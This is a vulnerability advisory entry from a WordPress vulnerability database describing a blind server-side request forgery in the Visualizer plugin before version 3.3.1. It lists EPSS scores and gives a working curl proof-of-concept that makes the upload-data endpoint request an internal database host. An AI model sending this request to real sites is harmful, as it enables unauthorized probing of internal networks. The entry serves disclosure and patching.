Lucene search

K
wpexploitWpvulndbWPEX-ID:B7A932EA-9086-4615-9176-EE1043914040
HistorySep 28, 2019 - 12:00 a.m.

Visualizer < 3.3.1 - Blind Server-Side Request Forgery (SSRF)

2019-09-2800:00:00
wpvulndb
6

EPSS

0.256

Percentile

96.8%

This plugin suffers from a blind SSRF vulnerability in the /wp-json/visualizer/v1/upload-data endpoint.

curl -i -s -X $'POST' \
    -H $'Host: 192.168.158.128:8000' \
    --data-binary $'{\"url\":\"http://db:3306\"}' \
    $'http://192.168.158.128:8000/wp-json/visualizer/v1/upload-data'

See the references for more details

EPSS

0.256

Percentile

96.8%

Related for WPEX-ID:B7A932EA-9086-4615-9176-EE1043914040